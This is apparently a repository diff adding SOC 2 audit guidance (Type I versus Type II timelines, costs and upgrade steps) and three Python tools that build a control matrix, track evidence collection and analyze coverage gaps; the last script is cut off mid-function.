├── Management provides representation letter
└── Report issued
```
### Accelerated Type II (Bridge from Type I)
```
Month 1-3: Type I Audit
├── Complete Type I assessment
├── Receive Type I report
└── Begin observation period immediately
Month 4-9: Observation Period
├── Controls operate with evidence collection
├── Address any Type I findings
└── Prepare for Type II testing
Month 10-12: Type II Audit
├── Auditor tests operating effectiveness
└── Type II report issued
```
---
## Cost Breakdown
### Type I Costs
| Cost Category | Range | Notes |
|--------------|-------|-------|
| Readiness assessment | $5K-$15K | Optional, but recommended for first-timers |
| Gap remediation | $10K-$50K | Depends on current maturity |
| Audit firm fees | $20K-$50K | Varies by scope, firm, and company size |
| Internal labor | $20K-$60K | Staff time for preparation and audit support |
| Tooling | $0-$20K | Compliance platforms, evidence management |
| **Total** | **$55K-$195K** | |
### Type II Costs
| Cost Category | Range | Notes |
|--------------|-------|-------|
| Readiness assessment | $5K-$15K | If not already done for Type I |
| Gap remediation | $15K-$75K | More thorough than Type I |
| Observation period monitoring | $10K-$30K | Internal effort for evidence collection |
| Audit firm fees | $30K-$100K+ | Larger scope, more testing |
| Internal labor | $40K-$120K | Ongoing effort across the observation period |
| Tooling | $5K-$40K | Compliance platforms, automation tools |
| **Total** | **$105K-$380K** | |
### Annual Renewal Costs (Type II)
| Cost Category | Range |
|--------------|-------|
| Audit firm fees | $25K-$80K |
| Internal labor | $30K-$80K |
| Tooling renewal | $5K-$30K |
| Remediation (if findings) | $5K-$30K |
| **Total** | **$65K-$220K** |
---
## Upgrade Path: Type I to Type II
### Step 1: Receive Type I Report
Review the Type I report for:
- Any exceptions or findings
- Auditor recommendations
- Control gaps identified during testing
- Areas where design could be strengthened
### Step 2: Address Type I Findings
- Remediate any exceptions before starting the observation period
- Strengthen control design based on auditor feedback
- Document all changes and their effective dates
### Step 3: Begin Observation Period
- Start the clock on your observation period (minimum 3 months, recommend 6)
- Implement evidence collection automation
- Assign control owners and review cadences
- Document any control changes during the period
### Step 4: Maintain During Observation
- Conduct monthly internal control reviews
- Track and remediate any control failures
- Keep evidence organized and timestamped
- Prepare for auditor walkthroughs
### Step 5: Type II Audit
- Auditor tests a sample of evidence across the observation period
- Auditor evaluates operating effectiveness
- Exceptions are documented with management responses
- Type II report issued
---
## What Auditors Test Differently
### Type I Testing
| Test | What the Auditor Does |
|------|----------------------|
| Inquiry | Asks control owners to describe how controls work |
| Inspection | Reviews policies, configurations, and documentation |
| Observation | May watch a control being executed (single instance) |
### Type II Additional Testing
| Test | What the Auditor Does |
|------|----------------------|
| Re-performance | Re-executes the control to verify it works correctly |
| Sampling | Selects samples from the full observation period |
| Walkthroughs | Traces a transaction end-to-end through all controls |
| Exception testing | Investigates any deviations found in samples |
| Consistency checks | Verifies controls operated the same way throughout the period |
---
## Report Distribution and Use
### Who Receives the Report
SOC 2 reports are **restricted-use documents** under AICPA standards:
- Your organization (the service organization)
- Your auditor
- User entities (customers) and their auditors
- Prospective customers under NDA
### Report Shelf Life
| Report Type | Practical Validity | Market Expectation |
|-------------|-------------------|-------------------|
| Type I | 6-12 months | Replace with Type II within 12 months |
| Type II | 12 months from period end | Renew annually; gap > 3 months raises concerns |
### Bridge Letters
If there is a gap between your report period end and a customer's request date, you may issue a **bridge letter** (also called a gap letter) stating:
- No material changes to the system since the report period
- No known control failures since the report period
- Management's assertion that controls continue to operate effectively
---
## Decision Framework
```
START
├─ Do you have existing controls operating for 6+ months?
│ ├─ YES → Do customers require Type II specifically?
│ │ ├─ YES → Go directly to Type II
│ │ └─ NO → Type I first (lower risk, validates design)
│ └─ NO → Type I first (build foundation)
├─ Is there an urgent deal requiring SOC 2 in < 4 months?
│ ├─ YES → Type I (fastest path to a report)
│ └─ NO → Evaluate maturity and go Type I or Type II
└─ Budget available for full Type II program?
├─ YES → Consider direct Type II if controls are mature
└─ NO → Type I first, budget Type II for next fiscal year
```
---
## Common Mistakes in the Upgrade Path
| Mistake | Consequence | Prevention |
|---------|------------|-----------|
| Starting observation before fixing Type I findings | Findings carry into Type II as exceptions | Remediate all Type I findings first |
| Choosing a 3-month observation period | Less convincing to customers; some reject < 6 months | Default to 6-month minimum observation |
| Changing auditors between Type I and Type II | New auditor must re-learn your environment; potential scope changes | Use the same firm for continuity |
| Not collecting evidence from day one of observation | Missing evidence for early-period controls | Start automated collection before observation begins |
| Treating the observation period as passive | Control failures go undetected until audit | Conduct monthly internal reviews during observation |
| Letting the Type I report expire before Type II is ready | Gap in coverage erodes customer confidence | Plan Type II timeline to overlap with Type I validity |

View File

@@ -0,0 +1,679 @@
#!/usr/bin/env python3
"""
SOC 2 Control Matrix Builder
Generates a SOC 2 control matrix from selected Trust Service Criteria categories.
Outputs in markdown, JSON, or CSV format.
Usage:
python control_matrix_builder.py --categories security --format md
python control_matrix_builder.py --categories security,availability --format json
python control_matrix_builder.py --categories security,availability,confidentiality,processing-integrity,privacy --format csv
"""
import argparse
import csv
import io
import json
import sys
from typing import Dict, List, Any
# Trust Service Criteria control definitions
TSC_CONTROLS: Dict[str, Dict[str, Any]] = {
"security": {
"name": "Security (Common Criteria)",
"controls": [
{
"id": "SEC-001",
"tsc": "CC1.1",
"description": "Management demonstrates commitment to integrity and ethical values",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Code of conduct, ethics policy, signed acknowledgments",
},
{
"id": "SEC-002",
"tsc": "CC1.2",
"description": "Board of directors demonstrates independence and exercises oversight",
"type": "Preventive",
"frequency": "Quarterly",
"evidence": "Board meeting minutes, oversight committee charters",
},
{
"id": "SEC-003",
"tsc": "CC1.3",
"description": "Management establishes organizational structure, reporting lines, and authorities",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Org charts, RACI matrices, role descriptions",
},
{
"id": "SEC-004",
"tsc": "CC1.4",
"description": "Organization demonstrates commitment to attract, develop, and retain competent individuals",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Training records, competency assessments, HR policies",
},
{
"id": "SEC-005",
"tsc": "CC1.5",
"description": "Organization holds individuals accountable for internal control responsibilities",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Performance reviews, disciplinary policy, accountability matrix",
},
{
"id": "SEC-006",
"tsc": "CC2.1",
"description": "Organization obtains and generates relevant quality information to support internal control",
"type": "Detective",
"frequency": "Continuous",
"evidence": "Information classification policy, data flow diagrams",
},
{
"id": "SEC-007",
"tsc": "CC2.2",
"description": "Organization internally communicates objectives and responsibilities for internal control",
"type": "Preventive",
"frequency": "Quarterly",
"evidence": "Internal communications, policy distribution records, training materials",
},
{
"id": "SEC-008",
"tsc": "CC2.3",
"description": "Organization communicates with external parties regarding matters affecting internal control",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Customer notifications, external communication policy, incident notices",
},
{
"id": "SEC-009",
"tsc": "CC3.1",
"description": "Organization specifies objectives to identify and assess risks",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Risk assessment methodology, risk register, risk appetite statement",
},
{
"id": "SEC-010",
"tsc": "CC3.2",
"description": "Organization identifies and analyzes risks to achievement of objectives",
"type": "Detective",
"frequency": "Annual",
"evidence": "Risk assessment report, threat modeling documentation",
},
{
"id": "SEC-011",
"tsc": "CC3.3",
"description": "Organization considers potential for fraud in assessing risks",
"type": "Detective",
"frequency": "Annual",
"evidence": "Fraud risk assessment, anti-fraud controls documentation",
},
{
"id": "SEC-012",
"tsc": "CC3.4",
"description": "Organization identifies and assesses changes that could impact internal control",
"type": "Detective",
"frequency": "Quarterly",
"evidence": "Change impact assessments, environmental scan reports",
},
{
"id": "SEC-013",
"tsc": "CC4.1",
"description": "Organization selects and performs ongoing and separate monitoring evaluations",
"type": "Detective",
"frequency": "Continuous",
"evidence": "Monitoring dashboards, automated alert configurations, review logs",
},
{
"id": "SEC-014",
"tsc": "CC4.2",
"description": "Organization evaluates and communicates internal control deficiencies",
"type": "Corrective",
"frequency": "Quarterly",
"evidence": "Deficiency tracking log, management reports, remediation plans",
},
{
"id": "SEC-015",
"tsc": "CC5.1",
"description": "Organization selects and develops control activities that mitigate risks",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Control matrix, risk treatment plans, control design documentation",
},
{
"id": "SEC-016",
"tsc": "CC5.2",
"description": "Organization selects and develops general control activities over technology",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "IT general controls documentation, technology policies",
},
{
"id": "SEC-017",
"tsc": "CC5.3",
"description": "Organization deploys control activities through policies and procedures",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Policy library, procedure documents, acknowledgment records",
},
{
"id": "SEC-018",
"tsc": "CC6.1",
"description": "Logical access security controls over protected information assets",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Access control policy, IAM configuration, SSO/MFA settings",
},
{
"id": "SEC-019",
"tsc": "CC6.2",
"description": "User access provisioning based on role and business need",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Provisioning tickets, role matrix, access request approvals",
},
{
"id": "SEC-020",
"tsc": "CC6.3",
"description": "User access removal upon termination or role change",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Deprovisioning tickets, termination checklists, access removal logs",
},
{
"id": "SEC-021",
"tsc": "CC6.4",
"description": "Periodic access reviews to validate appropriateness",
"type": "Detective",
"frequency": "Quarterly",
"evidence": "Access review reports, user entitlement listings, review sign-offs",
},
{
"id": "SEC-022",
"tsc": "CC6.5",
"description": "Physical access restrictions to facilities and protected assets",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Badge access logs, visitor logs, physical security configuration",
},
{
"id": "SEC-023",
"tsc": "CC6.6",
"description": "Encryption of data in transit and at rest",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "TLS configuration, encryption settings, certificate inventory",
},
{
"id": "SEC-024",
"tsc": "CC6.7",
"description": "Restrictions on data transmission and movement",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "DLP configuration, network segmentation, firewall rules",
},
{
"id": "SEC-025",
"tsc": "CC6.8",
"description": "Controls to prevent or detect unauthorized software",
"type": "Detective",
"frequency": "Continuous",
"evidence": "Endpoint protection config, software whitelist, malware scan reports",
},
{
"id": "SEC-026",
"tsc": "CC7.1",
"description": "Vulnerability identification and management",
"type": "Detective",
"frequency": "Weekly",
"evidence": "Vulnerability scan reports, remediation SLAs, patch records",
},
{
"id": "SEC-027",
"tsc": "CC7.2",
"description": "Monitoring for anomalies and security events",
"type": "Detective",
"frequency": "Continuous",
"evidence": "SIEM configuration, alert rules, monitoring dashboards",
},
{
"id": "SEC-028",
"tsc": "CC7.3",
"description": "Security event evaluation and incident classification",
"type": "Detective",
"frequency": "Continuous",
"evidence": "Incident classification criteria, triage procedures, event logs",
},
{
"id": "SEC-029",
"tsc": "CC7.4",
"description": "Incident response execution and recovery",
"type": "Corrective",
"frequency": "Continuous",
"evidence": "Incident response plan, incident tickets, postmortem reports",
},
{
"id": "SEC-030",
"tsc": "CC7.5",
"description": "Incident recovery and lessons learned",
"type": "Corrective",
"frequency": "Continuous",
"evidence": "Recovery records, lessons learned documentation, plan updates",
},
{
"id": "SEC-031",
"tsc": "CC8.1",
"description": "Change management authorization and testing",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Change tickets, approval records, test results, deployment logs",
},
{
"id": "SEC-032",
"tsc": "CC9.1",
"description": "Vendor and business partner risk management",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Vendor risk assessments, vendor register, SOC 2 reports from vendors",
},
{
"id": "SEC-033",
"tsc": "CC9.2",
"description": "Risk mitigation through insurance and other transfer mechanisms",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Insurance policies, risk transfer documentation",
},
],
},
"availability": {
"name": "Availability",
"controls": [
{
"id": "AVL-001",
"tsc": "A1.1",
"description": "Capacity management and infrastructure scaling",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Capacity monitoring dashboards, scaling policies, resource utilization reports",
},
{
"id": "AVL-002",
"tsc": "A1.1",
"description": "System performance monitoring and SLA tracking",
"type": "Detective",
"frequency": "Continuous",
"evidence": "Uptime reports, SLA dashboards, performance metrics",
},
{
"id": "AVL-003",
"tsc": "A1.2",
"description": "Data backup procedures and verification",
"type": "Preventive",
"frequency": "Daily",
"evidence": "Backup logs, backup success/failure reports, retention configuration",
},
{
"id": "AVL-004",
"tsc": "A1.2",
"description": "Disaster recovery planning and documentation",
"type": "Preventive",
"frequency": "Annual",
"evidence": "DR plan, BCP documentation, recovery procedures",
},
{
"id": "AVL-005",
"tsc": "A1.2",
"description": "Business continuity management and communication",
"type": "Preventive",
"frequency": "Annual",
"evidence": "BCP plan, communication tree, emergency contacts",
},
{
"id": "AVL-006",
"tsc": "A1.3",
"description": "Disaster recovery testing and validation",
"type": "Detective",
"frequency": "Annual",
"evidence": "DR test results, RTO/RPO measurements, test reports",
},
{
"id": "AVL-007",
"tsc": "A1.3",
"description": "Failover testing and redundancy validation",
"type": "Detective",
"frequency": "Quarterly",
"evidence": "Failover test records, redundancy configuration, test results",
},
],
},
"confidentiality": {
"name": "Confidentiality",
"controls": [
{
"id": "CON-001",
"tsc": "C1.1",
"description": "Data classification and labeling policy",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Data classification policy, labeling standards, data inventory",
},
{
"id": "CON-002",
"tsc": "C1.1",
"description": "Confidential data inventory and mapping",
"type": "Detective",
"frequency": "Quarterly",
"evidence": "Data inventory, data flow diagrams, system classification",
},
{
"id": "CON-003",
"tsc": "C1.2",
"description": "Encryption of confidential data at rest and in transit",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Encryption configuration, TLS settings, key management procedures",
},
{
"id": "CON-004",
"tsc": "C1.2",
"description": "Access restrictions to confidential information",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Access control lists, need-to-know policy, access review records",
},
{
"id": "CON-005",
"tsc": "C1.2",
"description": "Data loss prevention controls",
"type": "Detective",
"frequency": "Continuous",
"evidence": "DLP configuration, DLP alerts/incidents, exception approvals",
},
{
"id": "CON-006",
"tsc": "C1.3",
"description": "Secure data disposal and media sanitization",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Disposal procedures, sanitization certificates, destruction logs",
},
{
"id": "CON-007",
"tsc": "C1.3",
"description": "Data retention enforcement and schedule compliance",
"type": "Preventive",
"frequency": "Quarterly",
"evidence": "Retention schedule, deletion logs, retention compliance reports",
},
],
},
"processing-integrity": {
"name": "Processing Integrity",
"controls": [
{
"id": "PRI-001",
"tsc": "PI1.1",
"description": "Input validation and data accuracy controls",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Validation rules, input sanitization config, error handling logs",
},
{
"id": "PRI-002",
"tsc": "PI1.1",
"description": "Output verification and data integrity checks",
"type": "Detective",
"frequency": "Continuous",
"evidence": "Reconciliation reports, checksum verification, output validation logs",
},
{
"id": "PRI-003",
"tsc": "PI1.2",
"description": "Transaction completeness monitoring",
"type": "Detective",
"frequency": "Continuous",
"evidence": "Transaction logs, reconciliation reports, completeness dashboards",
},
{
"id": "PRI-004",
"tsc": "PI1.2",
"description": "Error handling and exception management",
"type": "Corrective",
"frequency": "Continuous",
"evidence": "Error logs, exception handling procedures, retry mechanisms",
},
{
"id": "PRI-005",
"tsc": "PI1.3",
"description": "Processing timeliness and SLA monitoring",
"type": "Detective",
"frequency": "Continuous",
"evidence": "SLA reports, processing time metrics, batch job monitoring",
},
{
"id": "PRI-006",
"tsc": "PI1.4",
"description": "Processing authorization and segregation of duties",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Authorization matrix, SoD controls, approval workflows",
},
],
},
"privacy": {
"name": "Privacy",
"controls": [
{
"id": "PRV-001",
"tsc": "P1.1",
"description": "Privacy notice publication and data collection transparency",
"type": "Preventive",
"frequency": "Annual",
"evidence": "Privacy policy, data collection notices, purpose statements",
},
{
"id": "PRV-002",
"tsc": "P2.1",
"description": "Consent management and preference tracking",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Consent records, opt-in/opt-out mechanisms, preference center",
},
{
"id": "PRV-003",
"tsc": "P3.1",
"description": "Data minimization and lawful collection",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Data collection audit, purpose limitation documentation, lawful basis records",
},
{
"id": "PRV-004",
"tsc": "P4.1",
"description": "Purpose limitation and use restrictions",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Data use policy, purpose limitation controls, access restrictions",
},
{
"id": "PRV-005",
"tsc": "P4.2",
"description": "Data retention schedules and disposal procedures",
"type": "Preventive",
"frequency": "Quarterly",
"evidence": "Retention schedule, deletion logs, disposal certificates",
},
{
"id": "PRV-006",
"tsc": "P5.1",
"description": "Data subject access request (DSAR) processing",
"type": "Corrective",
"frequency": "Continuous",
"evidence": "DSAR log, response records, processing timelines",
},
{
"id": "PRV-007",
"tsc": "P5.2",
"description": "Data correction and rectification rights",
"type": "Corrective",
"frequency": "Continuous",
"evidence": "Correction request records, data update logs",
},
{
"id": "PRV-008",
"tsc": "P6.1",
"description": "Third-party data sharing controls and notifications",
"type": "Preventive",
"frequency": "Continuous",
"evidence": "Data sharing agreements, third-party inventory, DPAs",
},
{
"id": "PRV-009",
"tsc": "P6.2",
"description": "Breach notification procedures",
"type": "Corrective",
"frequency": "Continuous",
"evidence": "Breach response plan, notification templates, incident records",
},
{
"id": "PRV-010",
"tsc": "P7.1",
"description": "Data quality and accuracy verification",
"type": "Detective",
"frequency": "Quarterly",
"evidence": "Data quality reports, accuracy checks, correction logs",
},
{
"id": "PRV-011",
"tsc": "P8.1",
"description": "Privacy program monitoring and compliance reviews",
"type": "Detective",
"frequency": "Quarterly",
"evidence": "Privacy audits, compliance dashboards, complaint tracking",
},
],
},
}
VALID_CATEGORIES = list(TSC_CONTROLS.keys())
def build_matrix(categories: List[str]) -> List[Dict[str, str]]:
"""Build a control matrix for the selected TSC categories."""
matrix = []
for cat in categories:
if cat not in TSC_CONTROLS:
continue
cat_data = TSC_CONTROLS[cat]
for ctrl in cat_data["controls"]:
matrix.append(
{
"control_id": ctrl["id"],
"tsc_criteria": ctrl["tsc"],
"category": cat_data["name"],
"description": ctrl["description"],
"control_type": ctrl["type"],
"frequency": ctrl["frequency"],
"evidence_required": ctrl["evidence"],
"owner": "TBD",
"status": "Not Started",
}
)
return matrix
def format_markdown(matrix: List[Dict[str, str]]) -> str:
"""Format control matrix as markdown table."""
lines = ["# SOC 2 Control Matrix", ""]
lines.append(
"| Control ID | TSC | Category | Description | Type | Frequency | Evidence | Owner | Status |"
)
lines.append(
"|------------|-----|----------|-------------|------|-----------|----------|-------|--------|"
)
for row in matrix:
lines.append(
"| {control_id} | {tsc_criteria} | {category} | {description} | {control_type} | {frequency} | {evidence_required} | {owner} | {status} |".format(
**row
)
)
lines.append("")
lines.append(f"**Total Controls:** {len(matrix)}")
return "\n".join(lines)
def format_csv(matrix: List[Dict[str, str]]) -> str:
"""Format control matrix as CSV."""
output = io.StringIO()
if not matrix:
return ""
writer = csv.DictWriter(output, fieldnames=matrix[0].keys())
writer.writeheader()
writer.writerows(matrix)
return output.getvalue()
def format_json(matrix: List[Dict[str, str]]) -> str:
"""Format control matrix as JSON."""
return json.dumps({"controls": matrix, "total": len(matrix)}, indent=2)
def main():
parser = argparse.ArgumentParser(
description="SOC 2 Control Matrix Builder — generates control matrices from selected Trust Service Criteria categories."
)
parser.add_argument(
"--categories",
type=str,
required=True,
help=f"Comma-separated TSC categories: {','.join(VALID_CATEGORIES)}",
)
parser.add_argument(
"--format",
type=str,
choices=["md", "json", "csv"],
default="md",
help="Output format (default: md)",
)
parser.add_argument(
"--json",
action="store_true",
help="Shorthand for --format json",
)
args = parser.parse_args()
# Parse categories
categories = [c.strip().lower() for c in args.categories.split(",")]
invalid = [c for c in categories if c not in VALID_CATEGORIES]
if invalid:
print(
f"Error: Invalid categories: {', '.join(invalid)}. Valid options: {', '.join(VALID_CATEGORIES)}",
file=sys.stderr,
)
sys.exit(1)
# Build matrix
matrix = build_matrix(categories)
if not matrix:
print("No controls found for the selected categories.", file=sys.stderr)
sys.exit(1)
# Output
fmt = "json" if args.json else args.format
if fmt == "md":
print(format_markdown(matrix))
elif fmt == "json":
print(format_json(matrix))
elif fmt == "csv":
print(format_csv(matrix))
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,240 @@
#!/usr/bin/env python3
"""
SOC 2 Evidence Tracker
Tracks evidence collection status per control in a SOC 2 control matrix.
Reads a JSON control matrix (from control_matrix_builder.py) and reports
collection completeness, overdue items, and readiness scoring.
Usage:
python evidence_tracker.py --matrix controls.json --status
python evidence_tracker.py --matrix controls.json --status --json
"""
import argparse
import json
import sys
from datetime import datetime
from typing import Dict, List, Any
# Evidence status classifications
EVIDENCE_STATUSES = {
"collected": "Evidence gathered and verified",
"pending": "Evidence identified but not yet collected",
"overdue": "Evidence past its collection deadline",
"not_started": "No evidence collection initiated",
"not_applicable": "Control not applicable to the environment",
}
# Expected evidence fields for a well-formed control entry
REQUIRED_FIELDS = ["control_id", "tsc_criteria", "description", "evidence_required"]
def load_matrix(filepath: str) -> List[Dict[str, Any]]:
"""Load a control matrix from a JSON file."""
try:
with open(filepath, "r") as f:
data = json.load(f)
except FileNotFoundError:
print(f"Error: File not found: {filepath}", file=sys.stderr)
sys.exit(1)
except json.JSONDecodeError as e:
print(f"Error: Invalid JSON in {filepath}: {e}", file=sys.stderr)
sys.exit(1)
# Accept both {"controls": [...]} and plain [...]
if isinstance(data, dict) and "controls" in data:
controls = data["controls"]
elif isinstance(data, list):
controls = data
else:
print(
"Error: Expected JSON with 'controls' array or a plain array.",
file=sys.stderr,
)
sys.exit(1)
return controls
def classify_evidence_status(control: Dict[str, Any]) -> str:
"""Classify the evidence collection status for a control."""
status = control.get("status", "Not Started").lower().strip()
evidence_date = control.get("evidence_date", "")
if status in ("not_applicable", "n/a", "not applicable"):
return "not_applicable"
if status in ("collected", "complete", "done"):
return "collected"
if status in ("pending", "in progress", "in_progress"):
# Check if overdue
if evidence_date:
try:
due = datetime.strptime(evidence_date, "%Y-%m-%d")
if due < datetime.now():
return "overdue"
except ValueError:
pass
return "pending"
if status in ("overdue", "late"):
return "overdue"
return "not_started"
def generate_status_report(controls: List[Dict[str, Any]]) -> Dict[str, Any]:
"""Generate an evidence collection status report."""
total = len(controls)
status_counts = {s: 0 for s in EVIDENCE_STATUSES}
by_category: Dict[str, Dict[str, int]] = {}
issues: List[Dict[str, str]] = []
for ctrl in controls:
status = classify_evidence_status(ctrl)
status_counts[status] = status_counts.get(status, 0) + 1
category = ctrl.get("category", "Unknown")
if category not in by_category:
by_category[category] = {s: 0 for s in EVIDENCE_STATUSES}
by_category[category][status] += 1
# Flag issues
if status == "overdue":
issues.append(
{
"control_id": ctrl.get("control_id", "N/A"),
"tsc_criteria": ctrl.get("tsc_criteria", "N/A"),
"description": ctrl.get("description", "N/A"),
"issue": "Evidence collection overdue",
"evidence_date": ctrl.get("evidence_date", "N/A"),
}
)
elif status == "not_started":
issues.append(
{
"control_id": ctrl.get("control_id", "N/A"),
"tsc_criteria": ctrl.get("tsc_criteria", "N/A"),
"description": ctrl.get("description", "N/A"),
"issue": "Evidence collection not started",
}
)
# Check for missing required fields
missing = [f for f in REQUIRED_FIELDS if f not in ctrl or not ctrl[f]]
if missing:
issues.append(
{
"control_id": ctrl.get("control_id", "N/A"),
"issue": f"Missing fields: {', '.join(missing)}",
}
)
# Calculate readiness score
applicable = total - status_counts.get("not_applicable", 0)
collected = status_counts.get("collected", 0)
readiness_pct = round((collected / applicable * 100), 1) if applicable > 0 else 0.0
if readiness_pct >= 90:
readiness_rating = "Audit Ready"
elif readiness_pct >= 75:
readiness_rating = "Minor Gaps"
elif readiness_pct >= 50:
readiness_rating = "Significant Gaps"
else:
readiness_rating = "Not Ready"
return {
"summary": {
"total_controls": total,
"status_breakdown": status_counts,
"readiness_score": readiness_pct,
"readiness_rating": readiness_rating,
"report_date": datetime.now().strftime("%Y-%m-%d"),
},
"by_category": by_category,
"issues": issues,
}
def format_status_text(report: Dict[str, Any]) -> str:
"""Format the status report as human-readable text."""
lines = ["=" * 60, "SOC 2 Evidence Collection Status Report", "=" * 60, ""]
summary = report["summary"]
lines.append(f"Report Date: {summary['report_date']}")
lines.append(f"Total Controls: {summary['total_controls']}")
lines.append(
f"Readiness Score: {summary['readiness_score']}% ({summary['readiness_rating']})"
)
lines.append("")
# Status breakdown
lines.append("--- Status Breakdown ---")
for status, count in summary["status_breakdown"].items():
label = EVIDENCE_STATUSES.get(status, status)
lines.append(f" {status:15s}: {count:3d} ({label})")
lines.append("")
# By category
lines.append("--- By Category ---")
for cat, statuses in report["by_category"].items():
cat_total = sum(statuses.values())
cat_collected = statuses.get("collected", 0)
cat_pct = round(cat_collected / cat_total * 100, 1) if cat_total > 0 else 0
lines.append(f" {cat}: {cat_collected}/{cat_total} collected ({cat_pct}%)")
lines.append("")
# Issues
if report["issues"]:
lines.append(f"--- Issues ({len(report['issues'])}) ---")
for issue in report["issues"]:
ctrl_id = issue.get("control_id", "N/A")
desc = issue.get("issue", "Unknown issue")
lines.append(f" [{ctrl_id}] {desc}")
else:
lines.append("--- No Issues Found ---")
lines.append("")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="SOC 2 Evidence Tracker — tracks evidence collection status per control."
)
parser.add_argument(
"--matrix",
type=str,
required=True,
help="Path to JSON control matrix file (from control_matrix_builder.py)",
)
parser.add_argument(
"--status",
action="store_true",
help="Generate evidence collection status report",
)
parser.add_argument(
"--json",
action="store_true",
help="Output in JSON format",
)
args = parser.parse_args()
if not args.status:
parser.print_help()
print("\nError: --status flag is required.", file=sys.stderr)
sys.exit(1)
controls = load_matrix(args.matrix)
report = generate_status_report(controls)
if args.json:
print(json.dumps(report, indent=2))
else:
print(format_status_text(report))
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,479 @@
#!/usr/bin/env python3
"""
SOC 2 Gap Analyzer
Analyzes current controls against SOC 2 Trust Service Criteria requirements
and identifies gaps. Supports both Type I (design) and Type II (design +
operating effectiveness) analysis.
Usage:
python gap_analyzer.py --controls current_controls.json --type type1
python gap_analyzer.py --controls current_controls.json --type type2 --json
"""
import argparse
import json
import sys
from datetime import datetime
from typing import Dict, List, Any, Tuple
# Minimum required TSC criteria coverage per category
REQUIRED_TSC = {
"security": {
"CC1.1": "Integrity and ethical values",
"CC1.2": "Board oversight",
"CC1.3": "Organizational structure",
"CC1.4": "Competence commitment",
"CC1.5": "Accountability",
"CC2.1": "Information quality",
"CC2.2": "Internal communication",
"CC2.3": "External communication",
"CC3.1": "Risk objectives",
"CC3.2": "Risk identification",
"CC3.3": "Fraud risk consideration",
"CC3.4": "Change risk assessment",
"CC4.1": "Monitoring evaluations",
"CC4.2": "Deficiency communication",
"CC5.1": "Control activities selection",
"CC5.2": "Technology controls",
"CC5.3": "Policy deployment",
"CC6.1": "Logical access security",
"CC6.2": "Access provisioning",
"CC6.3": "Access removal",
"CC6.4": "Access review",
"CC6.5": "Physical access",
"CC6.6": "Encryption",
"CC6.7": "Data transmission restrictions",
"CC6.8": "Unauthorized software prevention",
"CC7.1": "Vulnerability management",
"CC7.2": "Anomaly monitoring",
"CC7.3": "Event evaluation",
"CC7.4": "Incident response",
"CC7.5": "Incident recovery",
"CC8.1": "Change management",
"CC9.1": "Vendor risk management",
"CC9.2": "Risk mitigation/transfer",
},
"availability": {
"A1.1": "Capacity and performance management",
"A1.2": "Backup and recovery",
"A1.3": "Recovery testing",
},
"confidentiality": {
"C1.1": "Confidential data identification",
"C1.2": "Confidential data protection",
"C1.3": "Confidential data disposal",
},
"processing-integrity": {
"PI1.1": "Processing accuracy",
"PI1.2": "Processing completeness",
"PI1.3": "Processing timeliness",
"PI1.4": "Processing authorization",
},
"privacy": {
"P1.1": "Privacy notice",
"P2.1": "Choice and consent",
"P3.1": "Data collection",
"P4.1": "Use and retention",
"P4.2": "Disposal",
"P5.1": "Access rights",
"P5.2": "Correction rights",
"P6.1": "Disclosure controls",
"P6.2": "Breach notification",
"P7.1": "Data quality",
"P8.1": "Privacy monitoring",
},
}
# Type II additional checks
TYPE2_CHECKS = [
{
"check": "evidence_period",
"description": "Evidence covers the full observation period",
"severity": "critical",
},
{
"check": "operating_consistency",
"description": "Control operated consistently throughout the period",
"severity": "critical",
},
{
"check": "exception_handling",
"description": "Exceptions are documented and addressed",
"severity": "high",
},
{
"check": "owner_accountability",
"description": "Control owners documented and accountable",
"severity": "medium",
},
{
"check": "evidence_timestamps",
"description": "Evidence has timestamps within the observation period",
"severity": "high",
},
{
"check": "frequency_adherence",
"description": "Control executed at the specified frequency",
"severity": "critical",
},
]
def load_controls(filepath: str) -> List[Dict[str, Any]]:
"""Load current controls from a JSON file."""
try:
with open(filepath, "r") as f:
data = json.load(f)
except FileNotFoundError:
print(f"Error: File not found: {filepath}", file=sys.stderr)
sys.exit(1)
except json.JSONDecodeError as e:
print(f"Error: Invalid JSON in {filepath}: {e}", file=sys.stderr)
sys.exit(1)
if isinstance(data, dict) and "controls" in data:
return data["controls"]
elif isinstance(data, list):
return data
else:
print(
"Error: Expected JSON with 'controls' array or a plain array.",
file=sys.stderr,
)
sys.exit(1)
def detect_categories(controls: List[Dict[str, Any]]) -> List[str]:
"""Detect which TSC categories are represented in the controls."""
tsc_values = set()
for ctrl in controls:
tsc = ctrl.get("tsc_criteria", "")
if tsc:
tsc_values.add(tsc)
categories = set()
for cat, criteria in REQUIRED_TSC.items():
for tsc_id in criteria:
if tsc_id in tsc_values:
categories.add(cat)
break
# Always include security as it's required
categories.add("security")
return sorted(categories)
def analyze_coverage(
controls: List[Dict[str, Any]], categories: List[str]
) -> Tuple[List[Dict], List[Dict], List[Dict]]:
"""Analyze TSC coverage and identify gaps."""
# Map existing controls by TSC criteria
covered_tsc = {}
for ctrl in controls:
tsc = ctrl.get("tsc_criteria", "")
if tsc:
